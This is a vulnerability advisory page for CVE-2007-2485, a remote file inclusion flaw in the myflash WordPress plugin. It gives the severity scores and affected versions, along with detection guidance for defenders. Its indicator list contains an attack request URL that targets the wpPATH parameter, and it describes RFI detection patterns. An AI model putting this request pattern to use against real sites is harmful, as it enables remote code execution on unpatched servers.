cbcvebase.
CVE-2007-2485
published 2007-05-03

CVE-2007-2485: PHP remote file inclusion vulnerability in myflash-button.php in the myflash 1.00 and earlier plugin for WordPress allows remote attackers to execute arbitrary…

PriorityP358high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
54.85%
98.9th percentile
PHP remote file inclusion vulnerability in myflash-button.php in the myflash 1.00 and earlier plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the wpPATH parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
ruben_boelingermyflash<= 1.00

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://[target]/_path]/wp-content/plugins/myflash/myflash-button.php?wpPATH=Shl3?
filenamemyflash-button.php
  • Monitor HTTP GET and POST requests containing the 'wpPATH' parameter targeting myflash-button.php; a URL value in wpPATH indicates an RFI attempt.
  • Alert on any request to /wp-content/plugins/myflash/myflash-button.php with a wpPATH parameter value that begins with http:// or https://, indicating remote file inclusion.
  • ·The vulnerability affects myflash plugin version 1.00 and earlier for WordPress; the wpPATH parameter is accepted via both GET and POST, so detection rules must cover both HTTP methods.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.